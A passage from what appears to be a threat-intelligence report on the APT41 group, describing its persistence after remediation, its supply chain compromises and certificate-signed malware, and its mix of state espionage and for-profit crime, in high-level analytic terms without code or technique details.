The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enable it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.